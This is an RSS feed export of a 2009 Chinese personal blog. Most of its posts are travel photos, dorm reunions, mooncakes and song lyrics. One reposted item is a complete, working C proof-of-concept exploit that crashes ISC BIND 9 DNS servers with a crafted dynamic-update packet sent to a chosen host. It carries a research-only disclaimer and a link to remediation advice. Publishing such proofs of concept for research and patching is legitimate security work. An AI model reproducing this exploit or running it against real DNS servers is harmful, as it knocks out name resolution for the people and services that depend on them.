<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[冰火天地]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[Ice and fire fused, feelings hard to escape; heaven and earth in harmony, the world hard to foresee]]></description>
<link>http://hi.baidu.com/harite</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
<title><![CDATA[[Pictures are king] Huizhou Sanjiaozhou Island]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/0d5630f31f41945a342acc43.html]]></link>
        <description><![CDATA[
		
<p><font color="#ff0000">Disclaimer: the images in this post come from various sources; if you believe one of yours should not appear here, please contact me and I will remove it.</font></p>
<p>Here We Go!!</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/e58987b11a825a7a08230272.jpg"></p>
<p>That sea, those rocks, those trees, that grass, those people...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/09ad4916078d5c6421a4e950.jpg"></p>
<p>What a beautiful beach, what loft-style villas, and of course... the pair of "illegal devices" right in front of us.</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/f060a6af870cb0e27dd92a32.jpg"></p>
<p>These three-storey villas are very comfortable to stay in; they bring to mind "Heartbreak Utopia" (心碎乌托邦). A bunch of people playing Mafia in the first-floor living room was pretty good. Candid photographers are everywhere...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/6265c295cc95be65d0135e3e.jpg"></p>
<p>High moon, killing night~</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/5d9b718989891c9d0e244438.jpg"></p>
<p>Sunrise or sunset? You cannot tell from this photo alone, which shows you must look at a problem from every angle! Otherwise you will only ever "know autumn from a single leaf".</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/c09d004684c4ad276a63e504.jpg"></p>
<p>The speedboat really was fast; the wind was strong, but it felt great, the cold wind wakes you right up.<br>
<br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/1407f9de70519f7a95ee3707.jpg"></p>
<p>That sea-meets-sky feeling... what are they all doing?</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/cd5f4136044f3df3a2cc2b01.jpg"></p>
<p>Some are watching the sea...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/d5501795599911267af48003.jpg"></p>
<p>Some are paddling... By the way, lying on that rock in the distance was really comfortable; I nearly slept the whole night there. Apparently I'm still not calm enough.</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/73c3db43b3aec23d72f05d0d.jpg"></p>
<p>Some are meditating by the sea...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/88ac888b45f9bbfdfc1f1008.jpg"></p>
<p>There are pretty girls...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/2c8bab4432de4aacb3b7dc0b.jpg"></p>
<p>And so naturally there are "candid photographers"... but while the mantis stalks the cicada, the oriole waits behind. A tragedy...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/3a9d33dbbb104148d1164e15.jpg"></p>
<p>This one... a beauty in the distance? Or a sprite? Probably providing support for the "candid photographers".</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/0b07f219b8e82554dbb4bd11.jpg"></p>
<p>Buried in there is a guy notorious for being evil...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/084fe1c498b750878326ac13.jpg"></p>
<p>This one is great.</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/e2d4b8b772561fda30add11d.jpg"></p>
<p>We won't stoop to the level of the national football team...</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/2ad9aaec6a0f42132797911e.jpg"></p>
<p>Beach volleyball :-)</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/084fe1c498b250878326ac18.jpg"></p>
<p>How could the national game (table tennis) be left out?</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/8b182f1f7f3dc2e6a6866918.jpg"></p>
<p>Suddenly I miss the feeling of clearing the table in one break...<br>
<br>
<br>
Postscript:</p>
<p>This place is very relaxing and very enjoyable; the villas, sea views and cultural attractions are all very good, ideal for a family or a group of friends. The only downside is the price, which is a bit steep.</p>
<p>==============================================================</p>
<p>Introduction to Huizhou Sanjiaozhou Island</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/ea8c8bcb354ea5d353664f7d.jpg"></p>
<p><strong><font color="#ff6600">China's first private island with legal property rights</font></strong><br>
<font color="#333333">The island lies in the eastern waters of Daya Bay, Guangdong Province. It is China's first legal private island and the first island resort in China developed in the "Maldives style"; it mainly operates water sports, leisure holidays and real estate, and is also a diving centre of the General Administration of Sport of China and the international ocean diving association.</font><br>
<strong><font color="#ff6600">A paradise beyond the world, a fairyland on earth</font></strong><br>
<font color="#333333">The island has three sparkling white beaches, a crescent-shaped inner bay and a natural rock-sculpture park, with a total area of about 22 hectares, of which about 16 hectares is land. It consists of two islands, one large and one small, joined by sand at low tide. Lush greenery, pavilions half hidden among the trees and lifelike rocks of every curious shape make it feel like the legendary Penglai isle of the immortals, a paradise beyond the world.</font><br>
<strong><font color="#ff6600">"Maldives-style" island facilities</font></strong><br>
<font color="#333333">To preserve the island's character, the buildings use the "Maldives-style" low-rise form, winding and staggered along the island's hillsides so that every villa and every room looks out to sea, true sea-view accommodation. Service facilities are complete: Chinese and Western restaurants, a rock cafe, a supermarket, tennis courts, a billiards room, a card and board-game room, a multi-purpose ballroom, a conference hall and a beach sports ground, so pleasant you forget to go home.</font><br>
<font color="#ff6600"><strong>A paradise of water sports</strong></font><br>
<font color="#333333">The club has carefully designed and launched a diving club, a windsurfing club and a yacht club, letting members experience the world's most fashionable leisure water sports without leaving the country. In addition there is a rich and attractive range of water and beach activities: sea fishing, banana boats, inflatable boats, beach volleyball, football, archery, clay-pigeon shooting, darts and beach barbecue parties.</font><br>
<font color="#ff6600"><strong>Closed membership management model</strong></font><br>
<font color="#333333">The club runs a closed membership system and provides professional, high-quality and refined service; non-members may apply to visit the island during the club's annual membership promotion period.</font></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/1638d7c45b4092e538db497a.jpg"><br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/ae983cd359a2a52e3bf3cf44.jpg"><br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/c09d00468483ad276a63e545.jpg"><br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/efb13cd19bb3aa169a502746.jpg"><br>
</p> <a href="http://hi.baidu.com/harite/blog/item/0d5630f31f41945a342acc43.html">Read the full post</a>

<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/0d5630f31f41945a342acc43.html#comment">View comments</a>]]></description>
        <pubDate>2009年10月28日 星期三  下午 11:47</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/0d5630f31f41945a342acc43.html</guid>
</item>

<item>
<title><![CDATA[Shanghai Trip: Dorm One-Year Anniversary, Shanghai Leg]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/ea6b2c970788276755fb96a3.html]]></link>
        <description><![CDATA[
		
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/09e1daa2dbf6ee81cbefd0e2.jpg"></p>
<p>Made a trip to Shanghai, took care of some real business, and everyone from the dorm turned up, so we had a big get-together.</p>
<p>First, what Shanghai means to me: I actually have quite a few relatives there, and I first went before I was old enough to remember. My most recent visit was during the sophomore-year holiday. Overall, not unfamiliar, but not familiar either.</p>
<p>A few happy things:</p>
<p>1. Basked in the glow of a happy occasion.</p>
<p>2. Saw my dorm-mates and some university friends.</p>
<p>3. Took care of some matters that were not easy to handle, which was very gratifying.</p>
<p>Because time was so tight, a few regrets:</p>
<p>1. Didn't visit my colleague iris or boss benjurry. Also didn't visit two good buddies from back home, and didn't even tell those relatives, so didn't get to see the younger cousins.</p>
<p>2. Didn't go to Suzhou, and so missed some important things.</p>
<p>3. No chance to organize a gathering of Shanghai alumni, so missed meeting lots of university alumni.</p>
<p>4. On the evening of the 19th at Yuxin Sichuan Restaurant on Nanjing Road I barely drank any of the Xiaohutuxian liquor, the first time since I started drinking; rather ashamed.</p>
<p>5. And all the other things I should and shouldn't have thought of, should and shouldn't regret.</p>
<p>A few infuriating things:</p>
<p>1. <font color="#ff0000">On the way to the airport with a friend and his wife, his wife suddenly fainted. We hurried to find a car to the hospital, but several Shanghai taxi drivers simply would not stop! By contrast, a foreign old lady came over with water and helped pick up the laptop bag I had tossed aside! After all these years the character of some Shanghai taxi drivers is still that low: inhuman, leaving people to die. What a disgrace! With taxi drivers like these, even if Shanghai hosted the World Expo ten more times it would still be a second-rate small town among the world's cities. It is this same matter of character that decides how far the Chinese people still have to go on the road to being a great and strong nation. Truly a disgrace; compatriots thinking of moving to Shanghai should think twice, because in an emergency like this in Shanghai, a Shanghai taxi driver may well not stop.</font></p>
<p>2. After flying back to Shenzhen I felt a slight ache at the back of my head, and then several friends phoned: one of them had already gone to hospital, suspecting the food or the drink at the xx hot-pot place at lunch, and everyone had an obvious reaction. I drank the most; I fell asleep on the plane and when I opened my eyes again we were nearly there. So far I don't feel anything wrong, but the reaction time for alcohol poisoning is 12 to 24 hours, so I need to be careful. <font color="#ff0000">People always said xx folk were the big swindlers; thinking about it now, Shanghai compatriots need to watch out for their own people too</font>.</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/ea8c8bcb79dc69d152664fee.jpg"></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/290edb09bfd743aed1581be8.jpg"></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/e815f1f2781b4c3fb07ec5ea.jpg"></p> <a href="http://hi.baidu.com/harite/blog/item/ea6b2c970788276755fb96a3.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/ea6b2c970788276755fb96a3.html#comment">View comments</a>]]></description>
        <pubDate>2009年09月20日 星期日  下午 11:41</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/ea6b2c970788276755fb96a3.html</guid>
</item>

<item>
<title><![CDATA[2009 Mid-Autumn Festival Mooncakes]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/0a6339fa77a7a614a8d311e9.html]]></link>
        <description><![CDATA[
		
<p>Those who like a hazy sort of beauty can look at the photos below; compatriots who prefer sharp beauty can visit "<a target="_blank" href="http://user.qzone.qq.com/76167169/blog/1252585419">http://user.qzone.qq.com/76167169/blog/1252585419</a>" for the clear version.</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/5d9b71890c1797980f2444ac.jpg"></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/b7a23badeb95ee224b36d698.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/b7a23badeb95ee224b36d698.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/17f924dd864ce4f28c102966.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/17f924dd864ce4f28c102966.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/babf33010bba20257aec2c63.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/babf33010bba20257aec2c63.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/82572b3f9386e3c755e7236e.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/82572b3f9386e3c755e7236e.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/b3ac5b3df91ec1c53c6d9768.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/b3ac5b3df91ec1c53c6d9768.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/025740904488eba6a877a46a.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/025740904488eba6a877a46a.jpg"></a></p>
<p><a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/4b493029696978d598250a7a.jpg"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/abpic/item/4b493029696978d598250a7a.jpg"></a></p>
<a href="http://hi.baidu.com/harite/blog/item/0a6339fa77a7a614a8d311e9.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/0a6339fa77a7a614a8d311e9.html#comment">View comments</a>]]></description>
        <pubDate>2009年09月10日 星期四  下午 09:28</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/0a6339fa77a7a614a8d311e9.html</guid>
</item>

<item>
<title><![CDATA[XCON 2009 XFocus Security Summit T-shirt]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/62afdd2aacb9ec24d52af125.html]]></link>
        <description><![CDATA[
		
<p>XCON 2009 XFocus Security Summit T-shirt</p>
<p>lake2 got hold of a spare one from somewhere. It has a hole in it and can't be worn, so have a look, pay homage, then wash up and go to bed.</p>
<p>I have to mention that this one has a hole on the front right side... wonder if it can be exploited...</p>
<p><img class="blogimg" height="150" width="200" border="0" small="1" src="http://hiphotos.baidu.com/harite/pic/item/6f513ffa4c7e05a39f514650.jpg">&nbsp;&nbsp;&nbsp;  <a target="_blank" href="http://hiphotos.baidu.com/harite/pic/item/71d66f383c61ef0996ddd853.jpg"><img class="blogimg" border="0" small="1" src="http://hiphotos.baidu.com/harite/abpic/item/71d66f383c61ef0996ddd853.jpg"></a></p> <a href="http://hi.baidu.com/harite/blog/item/62afdd2aacb9ec24d52af125.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%B0%B2%C8%AB%BC%BC%CA%F5">Security Techniques</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/62afdd2aacb9ec24d52af125.html#comment">View comments</a>]]></description>
        <pubDate>2009年08月22日 星期六  上午 00:07</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/62afdd2aacb9ec24d52af125.html</guid>
</item>

<item>
<title><![CDATA[I've never been willing to admit you were just a passer-by in my life [Youku video]]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/f840672287ad96ad4723e82c.html]]></link>
        <description><![CDATA[
		
		<p><embed style="width: 450px; height: 390px" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://player.youku.com/player.php/sid/XMTAxODgwNDQ0/v.swf" width="450" height="390" type="application/x-shockwave-flash" wmode="transparent" play="true" loop="false" menu="false"></embed></p>
<p>Came across this by chance; the background music is very listenable.</p>
<div class="t_msgfont1">
<p>Song: Xinyuan (Wish) <br>
Singers: Wang Ze, Yang Ying, Qiao Yuan, Tang Jing <br>
<br>
Lyrics: Wang Ze <br>
Music: Wang Ze <br>
<br>
The lake is your gaze <br>
Dreams fill the sky with stars <br>
A mood is a legend <br>
Waiting, unchanged through the ages <br>
Growing up is a door made of leaves <br>
Childhood has a crowd of dear ones <br>
Spring is a stretch of road <br>
Held through seas turning into fields <br>
Those people I loved <br>
Those winds that went away <br>
Those forever vows, over and over <br>
Those people who loved me <br>
Those tears that settled <br>
Those forever vows, over and over <br>
We all once had an innocent and sorrowful face <br>
Holding sunlight in our hands, we gazed into the distance <br>
Softly, day by day, year after year <br>
As we grow up, will we still sing of our wishes <br>
As we grow up, will we still sing</p>
</div>
<font color="#000000">The song's lyricist and composer is Wang Ze, who is also one of the singers: the one on the left is Wang Ze, beside him Yang Ying (chorus solo), Qiao Yuan (the one singing the la-la-la backing in the chorus) and Tang Jinglian (the low harmony). This is in a classroom at Minzu University of China......</font>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/250705b311d44c8dd8335a14.jpg"></p>
<p>The text in this MV is decent as well; extracted and excerpted here:</p>
<p>I've never been willing to admit you were just a passer-by in my life</p>
<p>When everything that made you happy can no longer make you happy</p>
<p>When the things that made you sad can no longer make you sad</p>
<p>When even everything that enraged you can no longer enrage you</p>
<p>Isn't that terrifying?</p>
<p>A philosopher once said: this is what is called growing old</p>
<p>Thinking of you again, your name, your smile, everything about you</p>
<p>Can only be prefixed with "someone else's"</p>
<p>Thinking again of the things we did together</p>
<p>Can only be prefixed with "once upon a time"</p>
<p>Some feelings are fingernails</p>
<p>Cut them off and they grow back</p>
<p>Of no consequence</p>
<p>But some feelings are teeth</p>
<p>Once lost, there is forever an aching wound that cannot be filled</p>
<p>Right time, right person: a lifetime of happiness</p>
<p>Right time, wrong person: a heartbreak</p>
<p>Wrong time, wrong person: an episode of folly</p>
<p>Wrong time, right person: a lifetime of sighs</p>
<p>I've never been willing to admit you were just a passer-by in my life</p>
<p>When you love someone</p>
<p>Don't take their hand lightly</p>
<p>And still less let go easily</p>
<p>Time passes</p>
<p>Love fades</p>
<p>Do people in love really just drift apart?</p>
<p>Some people stay carved into your life forever</p>
<p>Even if</p>
<p>You forget his voice</p>
<p>Forget his smile</p>
<p>Forget his face</p>
<p>Still, the feeling each time you think of him</p>
<p>Never changes......</p>
<p>-------</p>
<p>Sure enough, a lovesick girl's song, a lovesick girl's tune, a lovesick girl's MV...</p> <a href="http://hi.baidu.com/harite/blog/item/f840672287ad96ad4723e82c.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/f840672287ad96ad4723e82c.html#comment">View comments</a>]]></description>
        <pubDate>2009年08月15日 星期六  下午 04:48</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/f840672287ad96ad4723e82c.html</guid>
</item>

<item>
<title><![CDATA[ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC (reposted)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/8b182f1ffa2e5fc1a6866920.html]]></link>
        <description><![CDATA[
		
<h2 class="post-title">ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC</h2>
<div class="post-vuln">SSV ID:<a title="ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC" target="_blank" href="http://www.sebug.net/exploit/11948/">11948</a></div>
<div class="post-vuln">SEBUG-Appdir:<a title="BIND" href="http://www.sebug.net/appdir/BIND/">BIND</a></div>
<div class="post-vuln">Published: 2009-07-30</div>
<div class="post-vuln">Test method:</div>
<div class="exp-content"><span class="bugexp_url">[www.sebug.net]<br>
The programs (methods) provided on this site may be offensive in nature and are provided for security research and teaching only; use at your own risk!</span>
<pre>/*
    ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
    &quot;Based on:
    http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt
    by kingcope - this is basically a rewrite of the above, lame i know, but fun enough
    
    for the [zone] argument you can try what is in the named.conf with &quot;type master&quot;
*/
 
#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netdb.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;netdb.h&gt;
#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
 
#define PORT 31337
 
struct dnspkt1 {
    unsigned short transact;
    unsigned short flags;
    unsigned short zones;
    unsigned short pr;
    unsigned short updates;
    unsigned short rrs;
};
 
struct dnspkt2 {
    unsigned short type;
    unsigned short class;
    unsigned short name2;
    unsigned short type2;
    unsigned short class2;
    unsigned short ttl1;
    unsigned short ttl2;
    unsigned short datalen;
    unsigned short name3;
    unsigned short type3;
    unsigned short class3;
    unsigned short ttl3;
    unsigned short ttl4;
    unsigned short datalen2;
};
 
int packdomain(char * dest, const char *src)
{
  int i,n,cnt;
 
  n=strlen(src);
  dest[n+1]=0;  // terminator
 
  cnt=0;
  for (i=n; i&gt;0; i--)
  {
    if (src[i-1]=='.')
    {
      dest[i]=cnt;
      cnt=0;
    }
    else
    {
      dest[i]=src[i-1];
      cnt++;
    }
  }
  dest[0]=cnt;
  return n+2;
}
 
int main(int argc, char **argv) {
    int sockfd, clilen;
    struct sockaddr_in serv_addr, cli_addr;
    struct dnspkt1 d1;
    struct dnspkt2 d2;
 
    printf(&quot;ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n&quot;);
    printf(&quot;Based on:\n&quot;);
    printf(&quot;http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n&quot;);
    printf(&quot;by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n&quot;);
 
    if (argc &lt; 2) {
        printf(&quot;usage: %s &lt;host&gt; [zone]\n&quot;, argv[0]);
        return 0;
    }
 
        sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sockfd &lt; 0) {
                printf(&quot;error on socket() call&quot;);
                return -1;
        }
 
        memset(&amp;serv_addr, '\0', sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(PORT);
 
        if (bind(sockfd, (struct sockaddr *) &amp;serv_addr, sizeof(serv_addr)) &lt; 0) {
                printf(&quot;error binding socket\n&quot;);
                return -1;
        }
    
        memset(&amp;cli_addr, '\0', sizeof(cli_addr));
        cli_addr.sin_family = AF_INET;
        cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
        cli_addr.sin_port = htons(53);
    
    memset(&amp;d1, '\0', sizeof(d1));
    memset(&amp;d2, '\0', sizeof(d2));
    d1.transact = htons(0x1cd6);
    d1.flags = htons(0x2800);
    d1.zones = htons(0x0001);
    d1.pr = htons(0x0001);
    d1.updates = htons(0x0001);
    d1.rrs = 0;
    char *name = (char*)malloc(8096);
    char nam[1024];
 
    if (argc &lt; 3) {
        /* Not sure if this is right to set as default, have no clue about dns proto
           It works for me.. */
        strcpy(nam, &quot;127.in-addr.arpa&quot;);
    } else {
        strncpy(nam, argv[2], sizeof(nam));
        nam[sizeof(nam)-1]=0;
    }
 
    int n=packdomain(name, (char*)nam);
    d2.type = htons(0x0006);
    d2.class = htons(0x0001);
    d2.name2 = htons(0xc00c);
    d2.type2 = htons(0x00ff);
    d2.class2 = htons(0x0001);
    d2.datalen = 0;
    d2.name3 = htons(0xc00c);
    d2.type3 = htons(0x00ff);
    d2.class3 = htons(0x00ff);
    d2.ttl1 = 0;
    d2.ttl2 = 0;
    d2.ttl3 = 0;
    d2.ttl4 = 0;
    d2.datalen2 = 0;
 
    char buffer[10000];
    memcpy(buffer, &amp;d1, sizeof(d1));
    memcpy(buffer+sizeof(d1), name, n);
    memcpy(buffer+sizeof(d1)+n, &amp;d2, sizeof(d2));
 
    clilen=sizeof(cli_addr);
    
    sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&amp;cli_addr, sizeof(cli_addr));
    printf(&quot;aight!\n&quot;);
    return 0;
}</pre>
</div>
<div class="post-sebug">
<p>// sebug.net [2009-07-31]</p>
<p>From: <a href="http://www.sebug.net/exploit/11948/">http://www.sebug.net/exploit/11948/</a></p>
<p>Affected versions and remediation advice: <a href="http://www.sebug.net/vulndb/11919/">http://www.sebug.net/vulndb/11919/</a></p>
<p>------</p>
<p>Eternal BIND, eternal vulnerabilities.</p>
</div> <a href="http://hi.baidu.com/harite/blog/item/8b182f1ffa2e5fc1a6866920.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%B0%B2%C8%AB%BC%BC%CA%F5">Security Techniques</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/8b182f1ffa2e5fc1a6866920.html#comment">View comments</a>]]></description>
        <pubDate>2009年08月02日 星期日  下午 05:06</pubDate>
        <category><![CDATA[安全技术]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/8b182f1ffa2e5fc1a6866920.html</guid>
</item>

<item>
<title><![CDATA[One Year After Graduation: Dorm Reunion (4 of 6, Shenzhen Leg)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/3cc2aec2c02d88120ef477f7.html]]></link>
        <description><![CDATA[
		
<p>So it's just one year since graduation, and three of the other five guys from my university dorm had time to come to Shenzhen. An anniversary celebration! Venue: Shenzhen.</p>
<p>No more chatter, straight to the good stuff.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/81d1e350f9491e7b1038c286.jpg"></p>
<p>After all these years this guy still never misses a chance to show off his "style". He's not that good-looking either; better to keep a low profile like me.</p>
<div forimg="1">
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/d035fc24de07d4148744f982.jpg"></p>
<p>Same guy again: claiming he was full of longing for China's capital of knock-offs, he insisted on a stroll down the famous Huaqiangbei electronics street. We had planned to go and enjoy the Xiaomeisha resort, but ended up wandering that street all afternoon.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/2845ba7e1ee8bd1f0cd7da83.jpg"></p>
<p>My poor bed... sob, it's been wrecked beyond recognition.</p>
<p>Four-player Dou Dizhu isn't as fun as the five-player version with a sidekick, but it had its own charm; the penalty was Truth or Dare. Some of the truths may never be mentioned again for years, or for the rest of our lives; the dare plans were downright dirty and perverse, a real pack of beasts (except the one on the far left)....</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/2a759ddd782d75135982dd8c.jpg"></p>
<p>The one on the left isn't Sun Wukong, the one on the right really is me... Behind us is the Eiffel Tower, the thing that shoots lightning in some twisted mod of Red Alert 2. A French luxury item.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/9e499fcaf7a37fa1c917688d.jpg"></p>
<p>Bowing to every Buddha you meet is never wrong.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/71d66f38dabb490497ddd88f.jpg"></p>
<p>This guy, fighting kids for the swing... worse than a beast.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/076756603dc686f88db10d88.jpg"></p>
<p>Wang Yu refused point-blank to go into this room and drink Japanese tea... Respect, an iron-blooded real man.</p>
<p>Actually I still don't get it: why does the sign say "Kado" (flower arranging)?</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/2fb8fa1f3946f5d2e0fe0b89.jpg"></p>
<p>Although I knew it was extremely uncivilized, I still washed my hands in this watercourse leading to the Taj Mahal...</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/7045435407530573564e008a.jpg"></p>
<p>Note, everyone: I'm holding two bottles of iced tea only because one of them had already been warmed by the sun... I threw it away soon after.</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/harite/pic/item/166253826ec708850cf4d28b.jpg"></p>
<p>Old Jiang's inscription has to be there!</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div> <a href="http://hi.baidu.com/harite/blog/item/3cc2aec2c02d88120ef477f7.html">Read the full post</a>
		
<br/><b>Category:</b><a href="http://hi.baidu.com/harite/blog/category/%C9%FA%BB%EE%CD%F2%CB%EA">Long Live Life</a>&nbsp;<a href="http://hi.baidu.com/harite/blog/item/3cc2aec2c02d88120ef477f7.html#comment">View comments</a>]]></description>
        <pubDate>2009年07月15日 星期三  下午 11:22</pubDate>
        <category><![CDATA[生活万岁]]></category>
        <author><![CDATA[harite]]></author>
		<guid>http://hi.baidu.com/harite/blog/item/3cc2aec2c02d88120ef477f7.html</guid>
</item>

<item>
<title><![CDATA[Those Unforgettable Things I Recorded (reposted)]]></title>
        <link><![CDATA[http://hi.baidu.com/harite/blog/item/d674454a4d07542a08f7ef67.html]]></link>
        <description><![CDATA[
		
<p>One year into my job, which is also one year after graduation, I saw the farewell reflections of a younger schoolmate who had been held back a year. We were in the same dorm; he only became my junior because special circumstances made him take a year off.</p>
